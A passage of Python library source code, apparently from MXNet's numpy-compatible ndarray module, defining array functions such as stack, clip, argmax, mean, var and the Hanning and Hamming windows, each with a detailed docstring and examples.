If provided, the destination to place the result. The shape must be correct,
matching that of what stack would have returned if no out argument were specified.
Returns
-------
stacked : ndarray
The stacked array has one more dimension than the input arrays."""
def get_list(arrays):
if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
return [arr for arr in arrays]
arrays = get_list(arrays)
return _npi.stack(*arrays, axis=axis, out=out)
@set_module('mxnet.ndarray.numpy')
def vstack(arrays, out=None):
r"""Stack arrays in sequence vertically (row wise).
This is equivalent to concatenation along the first axis after 1-D arrays
of shape `(N,)` have been reshaped to `(1,N)`. Rebuilds arrays divided by
`vsplit`.
This function makes most sense for arrays with up to 3 dimensions. For
instance, for pixel-data with a height (first axis), width (second axis),
and r/g/b channels (third axis). The functions `concatenate` and `stack`
provide more general stacking and concatenation operations.
Parameters
----------
tup : sequence of ndarrays
The arrays must have the same shape along all but the first axis.
1-D arrays must have the same length.
Returns
-------
stacked : ndarray
The array formed by stacking the given arrays, will be at least 2-D.
Examples
--------
>>> a = np.array([1, 2, 3])
>>> b = np.array([2, 3, 4])
>>> np.vstack((a, b))
array([[1., 2., 3.],
[2., 3., 4.]])
>>> a = np.array([[1], [2], [3]])
>>> b = np.array([[2], [3], [4]])
>>> np.vstack((a, b))
array([[1.],
[2.],
[3.],
[2.],
[3.],
[4.]])
"""
def get_list(arrays):
if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
return [arr for arr in arrays]
arrays = get_list(arrays)
return _npi.vstack(*arrays)
@set_module('mxnet.ndarray.numpy')
def row_stack(arrays):
r"""Stack arrays in sequence vertically (row wise).
This is equivalent to concatenation along the first axis after 1-D arrays
of shape `(N,)` have been reshaped to `(1,N)`. Rebuilds arrays divided by
`vsplit`.
This function makes most sense for arrays with up to 3 dimensions. For
instance, for pixel-data with a height (first axis), width (second axis),
and r/g/b channels (third axis). The functions `concatenate` and `stack`
provide more general stacking and concatenation operations.
Parameters
----------
tup : sequence of ndarrays
The arrays must have the same shape along all but the first axis.
1-D arrays must have the same length.
Returns
-------
stacked : ndarray
The array formed by stacking the given arrays, will be at least 2-D.
Examples
--------
>>> a = np.array([1, 2, 3])
>>> b = np.array([2, 3, 4])
>>> np.vstack((a, b))
array([[1., 2., 3.],
[2., 3., 4.]])
>>> a = np.array([[1], [2], [3]])
>>> b = np.array([[2], [3], [4]])
>>> np.vstack((a, b))
array([[1.],
[2.],
[3.],
[2.],
[3.],
[4.]])
"""
def get_list(arrays):
if not hasattr(arrays, '__getitem__') and hasattr(arrays, '__iter__'):
raise ValueError("expected iterable for arrays but got {}".format(type(arrays)))
return [arr for arr in arrays]
arrays = get_list(arrays)
return _npi.vstack(*arrays)
@set_module('mxnet.ndarray.numpy')
def column_stack(tup):
"""
Stack 1-D arrays as columns into a 2-D array.
Take a sequence of 1-D arrays and stack them as columns
to make a single 2-D array. 2-D arrays are stacked as-is,
just like with `hstack`. 1-D arrays are turned into 2-D columns
first.
Returns
--------
stacked : 2-D array
The array formed by stacking the given arrays.
See Also
--------
stack, hstack, vstack, concatenate
Examples
--------
>>> a = np.array((1,2,3))
>>> b = np.array((2,3,4))
>>> np.column_stack((a,b))
array([[1., 2.],
[2., 3.],
[3., 4.]])
"""
return _npi.column_stack(*tup)
@set_module('mxnet.ndarray.numpy')
def hstack(arrays):
"""
Stack arrays in sequence horizontally (column wise).
This is equivalent to concatenation along the second axis,
except for 1-D arrays where it concatenates along the first axis.
Rebuilds arrays divided by hsplit.
This function makes most sense for arrays with up to 3 dimensions.
For instance, for pixel-data with a height (first axis), width (second axis),
and r/g/b channels (third axis). The functions concatenate,
stack and block provide more general stacking and concatenation operations.
Parameters
----------
tup : sequence of ndarrays
The arrays must have the same shape along all but the second axis, except 1-D arrays which can be any length.
Returns
-------
stacked : ndarray
The array formed by stacking the given arrays.
Examples
--------
>>> from mxnet import np,npx
>>> a = np.array((1,2,3))
>>> b = np.array((2,3,4))
>>> np.hstack((a,b))
array([1., 2., 3., 2., 3., 4.])
>>> a = np.array([[1],[2],[3]])
>>> b = np.array([[2],[3],[4]])
>>> np.hstack((a,b))
array([[1., 2.],
[2., 3.],
[3., 4.]])
"""
return _npi.hstack(*arrays)
@set_module('mxnet.ndarray.numpy')
def dstack(arrays):
"""
Stack arrays in sequence depth wise (along third axis).
This is equivalent to concatenation along the third axis after 2-D arrays
of shape `(M,N)` have been reshaped to `(M,N,1)` and 1-D arrays of shape
`(N,)` have been reshaped to `(1,N,1)`. Rebuilds arrays divided by
`dsplit`.
This function makes most sense for arrays with up to 3 dimensions. For
instance, for pixel-data with a height (first axis), width (second axis),
and r/g/b channels (third axis). The functions `concatenate`, `stack` and
`block` provide more general stacking and concatenation operations.
Parameters
----------
tup : sequence of arrays
The arrays must have the same shape along all but the third axis.
1-D or 2-D arrays must have the same shape.
Returns
-------
stacked : ndarray
The array formed by stacking the given arrays, will be at least 3-D.
Examples
--------
>>> a = np.array((1,2,3))
>>> b = np.array((2,3,4))
>>> np.dstack((a,b))
array([[[1, 2],
[2, 3],
[3, 4]]])
>>> a = np.array([[1],[2],[3]])
>>> b = np.array([[2],[3],[4]])
>>> np.dstack((a,b))
array([[[1, 2]],
[[2, 3]],
[[3, 4]]])
"""
return _npi.dstack(*arrays)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def maximum(x1, x2, out=None, **kwargs):
"""
Returns element-wise maximum of the input arrays with broadcasting.
Parameters
----------
x1, x2 : scalar or mxnet.numpy.ndarray
The arrays holding the elements to be compared. They must have the same shape,
or shapes that can be broadcast to a single shape.
Returns
-------
out : mxnet.numpy.ndarray or scalar
The maximum of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars."""
return _ufunc_helper(x1, x2, _npi.maximum, _np.maximum, _npi.maximum_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def minimum(x1, x2, out=None, **kwargs):
"""
Returns element-wise minimum of the input arrays with broadcasting.
Parameters
----------
x1, x2 : scalar or mxnet.numpy.ndarray
The arrays holding the elements to be compared. They must have the same shape,
or shapes that can be broadcast to a single shape.
Returns
-------
out : mxnet.numpy.ndarray or scalar
The minimum of x1 and x2, element-wise. This is a scalar if both x1 and x2 are scalars."""
return _ufunc_helper(x1, x2, _npi.minimum, _np.minimum, _npi.minimum_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
def swapaxes(a, axis1, axis2):
"""Interchange two axes of an array.
Parameters
----------
a : ndarray
Input array.
axis1 : int
First axis.
axis2 : int
Second axis.
Returns
-------
a_swapped : ndarray
Swapped array. This is always a copy of the input array.
"""
return _npi.swapaxes(a, dim1=axis1, dim2=axis2)
@set_module('mxnet.ndarray.numpy')
def clip(a, a_min, a_max, out=None):
"""clip(a, a_min, a_max, out=None)
Clip (limit) the values in an array.
Given an interval, values outside the interval are clipped to
the interval edges. For example, if an interval of ``[0, 1]``
is specified, values smaller than 0 become 0, and values larger
than 1 become 1.
Parameters
----------
a : ndarray
Array containing elements to clip.
a_min : scalar or `None`
Minimum value. If `None`, clipping is not performed on lower
interval edge. Not more than one of `a_min` and `a_max` may be
`None`.
a_max : scalar or `None`
Maximum value. If `None`, clipping is not performed on upper
interval edge. Not more than one of `a_min` and `a_max` may be
`None`.
out : ndarray, optional
The results will be placed in this array. It may be the input
array for in-place clipping. `out` must be of the right shape
to hold the output. Its type is preserved.
Returns
-------
clipped_array : ndarray
An array with the elements of `a`, but where values
< `a_min` are replaced with `a_min`, and those > `a_max`
with `a_max`.
Notes
-----
ndarray `a_min` and `a_max` are not supported.
Examples
--------
>>> a = np.arange(10)
>>> np.clip(a, 1, 8)
array([1., 1., 2., 3., 4., 5., 6., 7., 8., 8.], dtype=float32)
>>> a
array([0., 1., 2., 3., 4., 5., 6., 7., 8., 9.], dtype=float32)
>>> np.clip(a, 3, 6, out=a)
array([3., 3., 3., 3., 4., 5., 6., 6., 6., 6.], dtype=float32)
"""
if a_min is None and a_max is None:
raise ValueError('array_clip: must set either max or min')
if a_min is None:
a_min = float('-inf')
if a_max is None:
a_max = float('inf')
return _npi.clip(a, a_min, a_max, out=out)
@set_module('mxnet.ndarray.numpy')
def argmax(a, axis=None, out=None):
r"""
Returns the indices of the maximum values along an axis.
Parameters
----------
a : ndarray
Input array. Only support ndarrays of dtype `float16`, `float32`, and `float64`.
axis : int, optional
By default, the index is into the flattened array, otherwise
along the specified axis.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
index_array : ndarray of indices whose dtype is same as the input ndarray.
Array of indices into the array. It has the same shape as `a.shape`
with the dimension along `axis` removed.
Notes
-----
In case of multiple occurrences of the maximum values, the indices
corresponding to the first occurrence are returned.
This function differs from the original `numpy.argmax
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.argmax.html>`_ in
the following aspects:
- Input type does not support Python native iterables(list, tuple, ...).
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> a = np.arange(6).reshape(2,3) + 10
>>> a
array([[10., 11., 12.],
[13., 14., 15.]])
>>> np.argmax(a)
array(5.)
>>> np.argmax(a, axis=0)
array([1., 1., 1.])
>>> np.argmax(a, axis=1)
array([2., 2.])
>>> b = np.arange(6)
>>> b[1] = 5
>>> b
array([0., 5., 2., 3., 4., 5.])
>>> np.argmax(b) # Only the first occurrence is returned.
array(1.)
Specify ``out`` ndarray:
>>> a = np.arange(6).reshape(2,3) + 10
>>> b = np.zeros((2,))
>>> np.argmax(a, axis=1, out=b)
array([2., 2.])
>>> b
array([2., 2.])
"""
return _npi.argmax(a, axis=axis, keepdims=False, out=out)
@set_module('mxnet.ndarray.numpy')
def argmin(a, axis=None, out=None):
r"""
Returns the indices of the maximum values along an axis.
Parameters
----------
a : ndarray
Input array. Only support ndarrays of dtype `float16`, `float32`, and `float64`.
axis : int, optional
By default, the index is into the flattened array, otherwise
along the specified axis.
out : ndarray or None, optional
If provided, the result will be inserted into this array. It should
be of the appropriate shape and dtype.
Returns
-------
index_array : ndarray of indices whose dtype is same as the input ndarray.
Array of indices into the array. It has the same shape as `a.shape`
with the dimension along `axis` removed.
Notes
-----
In case of multiple occurrences of the maximum values, the indices
corresponding to the first occurrence are returned.
This function differs from the original `numpy.argmax
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.argmax.html>`_ in
the following aspects:
- Input type does not support Python native iterables(list, tuple, ...).
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> a = np.arange(6).reshape(2,3) + 10
>>> a
array([[10., 11., 12.],
[13., 14., 15.]])
>>> np.argmin(a)
array(0.)
>>> np.argmin(a, axis=0)
array([0., 0., 0.])
>>> np.argmin(a, axis=1)
array([0., 0.])
>>> b = np.arange(6)
>>> b[2] = 0
>>> b
array([0., 1., 0., 3., 4., 5.])
>>> np.argmax(b) # Only the first occurrence is returned.
array(0.)
Specify ``out`` ndarray:
>>> a = np.arange(6).reshape(2,3) + 10
>>> b = np.zeros((2,))
>>> np.argmin(a, axis=1, out=b)
array([0., 0.])
>>> b
array([0., 0.])
"""
return _npi.argmin(a, axis=axis, keepdims=False, out=out)
@set_module('mxnet.ndarray.numpy')
def average(a, axis=None, weights=None, returned=False, out=None):
"""
Compute the weighted average along the specified axis.
Parameters
--------
a : ndarray
Array containing data to be averaged.
axis : None or int or tuple of ints, optional
Axis or axes along which to average a.
The default, axis=None, will average over
all of the elements of the input array.
If axis is negative it counts from the last to the first axis.
New in version 1.7.0.
If axis is a tuple of ints, averaging is
performed on all of the axes specified in the tuple
instead of a single axis or all the axes as before.
weights : ndarray, optional
An array of weights associated with the values in a, must be the same dtype with a.
Each value in a contributes to the average according to its associated weight.
The weights array can either be 1-D (in which case its length must be
the size of a along the given axis) or of the same shape as a.
If weights=None, then all data in a are assumed to have a weight equal to one.
The 1-D calculation is: avg = sum(a * weights) / sum(weights)
The only constraint on weights is that sum(weights) must not be 0.
returned : bool, optional
Default is False.
If True, the tuple (average, sum_of_weights) is returned,
otherwise only the average is returned.
If weights=None, sum_of_weights is equivalent to
the number of elements over which the average is taken.
out : ndarray, optional
If provided, the calculation is done into this array.
Returns
--------
retval, [sum_of_weights] : ndarray
Return the average along the specified axis.
When returned is True, return a tuple with the average as the first element
and the sum of the weights as the second element. sum_of_weights is of the same type as retval.
If a is integral, the result dtype will be float32, otherwise it will be the same as dtype of a.
Raises
--------
MXNetError
- When all weights along axis sum to zero.
- When the length of 1D weights is not the same as the shape of a along axis.
- When given 1D weights, the axis is not specified or is not int.
- When the shape of weights and a differ, but weights are not 1D.
See also
--------
mean
Notes
--------
This function differs from the original `numpy.average`
<https://numpy.org/devdocs/reference/generated/numpy.average.html>`_ in
the following way(s):
- Does not guarantee the same behavior with numpy when given float16 dtype and overflow happens
- Does not support complex dtype
- The dtypes of a and weights must be the same
- Integral a results in float32 returned dtype, not float64
Examples
--------
>>> data = np.arange(1, 5)
>>> data
array([1., 2., 3., 4.])
>>> np.average(data)
array(2.5)
>>> np.average(np.arange(1, 11), weights=np.arange(10, 0, -1))
array(4.)
>>> data = np.arange(6).reshape((3,2))
>>> data
array([[0., 1.],
[2., 3.],
[4., 5.]])
>>> weights = np.array([0.25, 0.75])
array([0.25, 0.75])
>>> np.average(data, axis=1, weights=weights)
array([0.75, 2.75, 4.75])
"""
if weights is None:
return _npi.average(a, axis=axis, weights=None, returned=returned, weighted=False, out=out)
else:
return _npi.average(a, axis=axis, weights=weights, returned=returned, out=out)
@set_module('mxnet.ndarray.numpy')
def mean(a, axis=None, dtype=None, out=None, keepdims=False): # pylint: disable=arguments-differ
"""
mean(a, axis=None, dtype=None, out=None, keepdims=None)
Compute the arithmetic mean along the specified axis.
Returns the average of the array elements.
The average is taken over the flattened array by default, otherwise over the specified axis.
Parameters
----------
a : ndarray
ndarray containing numbers whose mean is desired.
axis : None or int or tuple of ints, optional
Axis or axes along which the means are computed. The default is to compute the mean of the flattened array.
If this is a tuple of ints, a mean is performed over multiple axes,
instead of a single axis or all the axes as before.
dtype : data-type, optional
Type to use in computing the mean. For integer inputs, the default is float32;
for floating point inputs, it is the same as the input dtype.
out : ndarray, optional
Alternate output array in which to place the result. The default is None; if provided,
it must have the same shape and type as the expected output
keepdims : bool, optional
If this is set to True, the axes which are reduced are left in the result
as dimensions with size one. With this option, the result will broadcast correctly
against the input array.
If the default value is passed, then keepdims will not be passed through to the mean
method of sub-classes of ndarray, however any non-default value will be. If the sub-class
method does not implement keepdims any exceptions will be raised.
Returns
-------
m : ndarray, see dtype parameter above
If out=None, returns a new array containing the mean values,
otherwise a reference to the output array is returned.
Notes
-----
This function differs from the original `numpy.mean
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.mean.html>`_ in
the following way(s):
- only ndarray is accepted as valid input, python iterables or scalar is not supported
- default data type for integer input is float32
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> np.mean(a)
array(2.5)
>>> a = np.zeros((2, 512*512), dtype=np.float32)
>>> a[0,:] = 1.0
>>> a[1,:] = 0.1
>>> np.mean(a)
array(0.55)
>>> np.mean(a, dtype=np.float64)
array(0.55)
"""
return _npi.mean(a, axis=axis, dtype=dtype, keepdims=keepdims, out=out)
@set_module('mxnet.ndarray.numpy')
def std(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=too-many-arguments
"""
Compute the standard deviation along the specified axis.
Returns the standard deviation, a measure of the spread of a distribution,
of the array elements. The standard deviation is computed for the
flattened array by default, otherwise over the specified axis.
Parameters
----------
a : ndarray
Calculate the standard deviation of these values.
axis : None or int or tuple of ints, optional
Axis or axes along which the standard deviation is computed. The
default is to compute the standard deviation of the flattened array.
.. versionadded:: 1.7.0
If this is a tuple of ints, a standard deviation is performed over
multiple axes, instead of a single axis or all the axes as before.
dtype : dtype, optional
Type to use in computing the standard deviation. For arrays of
integer type the default is float64, for arrays of float types it is
the same as the array type.
out : ndarray, optional
Alternative output array in which to place the result. It must have
the same shape as the expected output but the type (of the calculated
values) will be cast if necessary.
ddof : int, optional
Means Delta Degrees of Freedom. The divisor used in calculations
is ``N - ddof``, where ``N`` represents the number of elements.
By default `ddof` is zero.
keepdims : bool, optional
If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option,
the result will broadcast correctly against the input array.
If the default value is passed, then `keepdims` will not be
passed through to the `std` method of sub-classes of
`ndarray`, however any non-default value will be. If the
sub-class' method does not implement `keepdims` any
exceptions will be raised.
Returns
-------
standard_deviation : ndarray, see dtype parameter above.
If `out` is None, return a new array containing the standard deviation,
otherwise return a reference to the output array.
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> np.std(a)
1.1180339887498949 # may vary
>>> np.std(a, axis=0)
array([1., 1.])
>>> np.std(a, axis=1)
array([0.5, 0.5])
In single precision, std() can be inaccurate:
>>> a = np.zeros((2, 512*512), dtype=np.float32)
>>> a[0, :] = 1.0
>>> a[1, :] = 0.1
>>> np.std(a)
array(0.45)
>>> np.std(a, dtype=np.float64)
array(0.45, dtype=float64)
"""
return _npi.std(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
@set_module('mxnet.ndarray.numpy')
def var(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False): # pylint: disable=too-many-arguments
"""
Compute the variance along the specified axis.
Returns the variance of the array elements, a measure of the spread of a
distribution. The variance is computed for the flattened array by
default, otherwise over the specified axis.
Parameters
----------
a : ndarray
Array containing numbers whose variance is desired. If `a` is not an
array, a conversion is attempted.
axis : None or int or tuple of ints, optional
Axis or axes along which the variance is computed. The default is to
compute the variance of the flattened array.
.. versionadded:: 1.7.0
If this is a tuple of ints, a variance is performed over multiple axes,
instead of a single axis or all the axes as before.
dtype : data-type, optional
Type to use in computing the variance. For arrays of integer type
the default is `float32`; for arrays of float types it is the same as
the array type.
out : ndarray, optional
Alternate output array in which to place the result. It must have
the same shape as the expected output, but the type is cast if
necessary.
ddof : int, optional
"Delta Degrees of Freedom": the divisor used in the calculation is
``N - ddof``, where ``N`` represents the number of elements. By
default `ddof` is zero.
keepdims : bool, optional
If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option,
the result will broadcast correctly against the input array.
If the default value is passed, then `keepdims` will not be
passed through to the `var` method of sub-classes of
`ndarray`, however any non-default value will be. If the
sub-class' method does not implement `keepdims` any
exceptions will be raised.
Returns
-------
variance : ndarray, see dtype parameter above
If ``out=None``, returns a new array containing the variance;
otherwise, a reference to the output array is returned.
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> np.var(a)
array(1.25)
>>> np.var(a, axis=0)
array([1., 1.])
>>> np.var(a, axis=1)
array([0.25, 0.25])
>>> a = np.zeros((2, 512*512), dtype=np.float32)
>>> a[0, :] = 1.0
>>> a[1, :] = 0.1
>>> np.var(a)
array(0.2025)
>>> np.var(a, dtype=np.float64)
array(0.2025, dtype=float64)
>>> ((1-0.55)**2 + (0.1-0.55)**2)/2
0.2025
"""
return _npi.var(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def indices(dimensions, dtype=_np.int32, ctx=None):
"""Return an array representing the indices of a grid.
Compute an array where the subarrays contain index values 0,1,...
varying only along the corresponding axis.
Parameters
----------
dimensions : sequence of ints
The shape of the grid.
dtype : data-type, optional
The desired data-type for the array. Default is `float32`.
ctx : device context, optional
Device context on which the memory is allocated. Default is
`mxnet.context.current_context()`.
Returns
-------
grid : ndarray
The array of grid indices,
``grid.shape = (len(dimensions),) + tuple(dimensions)``.
Notes
-----
The output shape is obtained by prepending the number of dimensions
in front of the tuple of dimensions, i.e. if `dimensions` is a tuple
``(r0, ..., rN-1)`` of length ``N``, the output shape is
``(N,r0,...,rN-1)``.
The subarrays ``grid[k]`` contains the N-D array of indices along the
``k-th`` axis. Explicitly::
grid[k,i0,i1,...,iN-1] = ik
Examples
--------
>>> grid = np.indices((2, 3))
>>> grid.shape
(2, 2, 3)
>>> grid[0] # row indices
array([[0, 0, 0],
[1, 1, 1]])
>>> grid[1] # column indices
array([[0, 0, 0],
[1, 1, 1]], dtype=int32)
The indices can be used as an index into an array.
>>> x = np.arange(20).reshape(5, 4)
>>> row, col = np.indices((2, 3))
>>> x[row, col]
array([[0., 1., 2.],
[4., 5., 6.]])
Note that it would be more straightforward in the above example to
extract the required elements directly with ``x[:2, :3]``.
"""
if isinstance(dimensions, (tuple, list)):
if ctx is None:
ctx = current_context()
return _npi.indices(dimensions=dimensions, dtype=dtype, ctx=ctx)
else:
raise ValueError("The dimensions must be sequence of ints")
# pylint: enable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def copysign(x1, x2, out=None, **kwargs):
r"""
Change the sign of x1 to that of x2, element-wise.
If `x2` is a scalar, its sign will be copied to all elements of `x1`.
Parameters
----------
x1 : ndarray or scalar
Values to change the sign of.
x2 : ndarray or scalar
The sign of `x2` is copied to `x1`.
out : ndarray or None, optional
A location into which the result is stored. It must be of the
right shape and right type to hold the output. If not provided
or `None`,a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
The values of `x1` with the sign of `x2`.
This is a scalar if both `x1` and `x2` are scalars.
Notes
-------
This function differs from the original `numpy.copysign
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.copysign.html>`_ in
the following aspects:
- ``where`` param is not supported.
Examples
--------
>>> np.copysign(1.3, -1)
-1.3
>>> 1/np.copysign(0, 1)
inf
>>> 1/np.copysign(0, -1)
-inf
>>> a = np.array([-1, 0, 1])
>>> np.copysign(a, -1.1)
array([-1., -0., -1.])
>>> np.copysign(a, np.arange(3)-1)
array([-1., 0., 1.])
"""
return _ufunc_helper(x1, x2, _npi.copysign, _np.copysign, _npi.copysign_scalar, _npi.rcopysign_scalar, out)
@set_module('mxnet.ndarray.numpy')
def ravel(x, order='C'):
r"""
ravel(x)
Return a contiguous flattened array.
A 1-D array, containing the elements of the input, is returned. A copy is
made only if needed.
Parameters
----------
x : ndarray
Input array. The elements in `x` are read in row-major, C-style order and
packed as a 1-D array.
order : `C`, optional
Only support row-major, C-style order.
Returns
-------
y : ndarray
y is an array of the same subtype as `x`, with shape ``(x.size,)``.
Note that matrices are special cased for backward compatibility, if `x`
is a matrix, then y is a 1-D ndarray.
Notes
-----
This function differs from the original numpy.arange in the following aspects:
- Only support row-major, C-style order.
Examples
--------
It is equivalent to ``reshape(x, -1)``.
>>> x = np.array([[1, 2, 3], [4, 5, 6]])
>>> print(np.ravel(x))
[1. 2. 3. 4. 5. 6.]
>>> print(x.reshape(-1))
[1. 2. 3. 4. 5. 6.]
>>> print(np.ravel(x.T))
[1. 4. 2. 5. 3. 6.]
"""
if order != 'C':
raise NotImplementedError('order {} is not supported'.format(order))
if isinstance(x, numeric_types):
return _np.reshape(x, -1)
elif isinstance(x, NDArray):
return _npi.reshape(x, -1)
else:
raise TypeError('type {} not supported'.format(str(type(x))))
def unravel_index(indices, shape, order='C'): # pylint: disable=redefined-outer-name
"""
Converts a flat index or array of flat indices into a tuple of coordinate arrays.
Parameters:
-------------
indices : array_like
An integer array whose elements are indices into the flattened version of an array of dimensions shape.
Before version 1.6.0, this function accepted just one index value.
shape : tuple of ints
The shape of the array to use for unraveling indices.
Returns:
-------------
unraveled_coords : ndarray
Each row in the ndarray has the same shape as the indices array.
Each column in the ndarray represents the unravelled index
Examples:
-------------
>>> np.unravel_index([22, 41, 37], (7,6))
([3. 6. 6.]
[4. 5. 1.])
>>> np.unravel_index(1621, (6,7,8,9))
(3, 1, 4, 1)
"""
if order == 'C':
if isinstance(indices, numeric_types):
return _np.unravel_index(indices, shape)
ret = _npi.unravel_index_fallback(indices, shape=shape)
ret_list = []
for item in ret:
ret_list += [item]
return tuple(ret_list)
else:
raise NotImplementedError('Do not support column-major (Fortran-style) order at this moment')
def diag_indices_from(arr):
"""
This returns a tuple of indices that can be used to access the main diagonal of an array
a with a.ndim >= 2 dimensions and shape (n, n, ..., n). For a.ndim = 2 this is
the usual diagonal, for a.ndim > 2 this is the set of indices to access
a[i, i, ..., i] for i = [0..n-1].
Parameters:
-------------
arr : ndarray
Input array for acessing the main diagonal. All dimensions
should have equal length.
Return:
-------------
diag: tuple of ndarray
indices of the main diagonal.
Examples:
-------------
>>> a = np.arange(16).reshape(4, 4)
>>> a
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15]])
>>> idx = np.diag_indices_from(a)
>>> idx
(array([0, 1, 2, 3]), array([0, 1, 2, 3]))
>>> a[idx] = 100
>>> a
array([[100, 1, 2, 3],
[ 4, 100, 6, 7],
[ 8, 9, 100, 11],
[ 12, 13, 14, 100]])
"""
return tuple(_npi.diag_indices_from(arr))
@set_module('mxnet.ndarray.numpy')
def hanning(M, dtype=_np.float32, ctx=None):
r"""Return the Hanning window.
The Hanning window is a taper formed by using a weighted cosine.
Parameters
----------
M : int
Number of points in the output window. If zero or less, an
empty array is returned.
dtype : str or numpy.dtype, optional
An optional value type. Default is `float32`. Note that you need
select numpy.float32 or float64 in this operator.
ctx : Context, optional
An optional device context (default is the current default context).
Returns
-------
out : ndarray, shape(M,)
The window, with the maximum value normalized to one (the value
one appears only if `M` is odd).
See Also
--------
blackman, hamming
Notes
-----
The Hanning window is defined as
.. math:: w(n) = 0.5 - 0.5cos\left(\frac{2\pi{n}}{M-1}\right)
\qquad 0 \leq n \leq M-1
The Hanning was named for Julius von Hann, an Austrian meteorologist.
It is also known as the Cosine Bell. Some authors prefer that it be
called a Hann window, to help avoid confusion with the very similar
Hamming window.
Most references to the Hanning window come from the signal processing
literature, where it is used as one of many windowing functions for
smoothing values. It is also known as an apodization (which means
"removing the foot", i.e. smoothing discontinuities at the beginning
and end of the sampled signal) or tapering function.
References
----------
.. [1] Blackman, R.B. and Tukey, J.W., (1958) The measurement of power
spectra, Dover Publications, New York.
.. [2] E.R. Kanasewich, "Time Sequence Analysis in Geophysics",
The University of Alberta Press, 1975, pp. 106-108.
.. [3] Wikipedia, "Window function",
http://en.wikipedia.org/wiki/Window_function
.. [4] W.H. Press, B.P. Flannery, S.A. Teukolsky, and W.T. Vetterling,
"Numerical Recipes", Cambridge University Press, 1986, page 425.
Examples
--------
>>> np.hanning(12)
array([0. , 0.07937324, 0.29229254, 0.5711574 , 0.8274304 ,
0.9797465 , 0.97974646, 0.82743025, 0.5711573 , 0.29229245,
0.07937312, 0. ])
Plot the window and its frequency response:
>>> import matplotlib.pyplot as plt
>>> window = np.hanning(51)
>>> plt.plot(window.asnumpy())
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.title("Hann window")
Text(0.5, 1.0, 'Hann window')
>>> plt.ylabel("Amplitude")
Text(0, 0.5, 'Amplitude')
>>> plt.xlabel("Sample")
Text(0.5, 0, 'Sample')
>>> plt.show()
"""
if ctx is None:
ctx = current_context()
return _npi.hanning(M, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def hamming(M, dtype=_np.float32, ctx=None):
r"""Return the hamming window.
The hamming window is a taper formed by using a weighted cosine.
Parameters
----------
M : int
Number of points in the output window. If zero or less, an
empty array is returned.
dtype : str or numpy.dtype, optional
An optional value type. Default is `float32`. Note that you need
select numpy.float32 or float64 in this operator.
ctx : Context, optional
An optional device context (default is the current default context).
Returns
-------
out : ndarray, shape(M,)
The window, with the maximum value normalized to one (the value
one appears only if `M` is odd).
See Also
--------
blackman, hanning
Notes
-----
The Hamming window is defined as
.. math:: w(n) = 0.54 - 0.46cos\left(\frac{2\pi{n}}{M-1}\right)
\qquad 0 \leq n \leq M-1
The Hamming was named for R. W. Hamming, an associate of J. W. Tukey
and is described in Blackman and Tukey. It was recommended for
smoothing the truncated autocovariance function in the time domain.
Most references to the Hamming window come from the signal processing
literature, where it is used as one of many windowing functions for
smoothing values. It is also known as an apodization (which means
"removing the foot", i.e. smoothing discontinuities at the beginning
and end of the sampled signal) or tapering function.
References
----------
.. [1] Blackman, R.B. and Tukey, J.W., (1958) The measurement of power
spectra, Dover Publications, New York.
.. [2] E.R. Kanasewich, "Time Sequence Analysis in Geophysics", The
University of Alberta Press, 1975, pp. 109-110.
.. [3] Wikipedia, "Window function",
https://en.wikipedia.org/wiki/Window_function
.. [4] W.H. Press, B.P. Flannery, S.A. Teukolsky, and W.T. Vetterling,
"Numerical Recipes", Cambridge University Press, 1986, page 425.
Examples
--------
>>> np.hamming(12)
array([0.08000001, 0.15302339, 0.34890914, 0.6054648 , 0.841236 ,
0.9813669 , 0.9813668 , 0.8412359 , 0.6054647 , 0.34890908,
0.15302327, 0.08000001])
Plot the window and its frequency response:
>>> import matplotlib.pyplot as plt
>>> window = np.hamming(51)
>>> plt.plot(window.asnumpy())
[<matplotlib.lines.Line2D object at 0x...>]
>>> plt.title("hamming window")
Text(0.5, 1.0, 'hamming window')
>>> plt.ylabel("Amplitude")
Text(0, 0.5, 'Amplitude')
>>> plt.xlabel("Sample")
Text(0.5, 0, 'Sample')
>>> plt.show()
"""
if ctx is None:
ctx = current_context()
return _npi.hamming(M, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def blackman(M, dtype=_np.float32, ctx=None):
r"""Return the Blackman window.
The Blackman window is a taper formed by using the first three
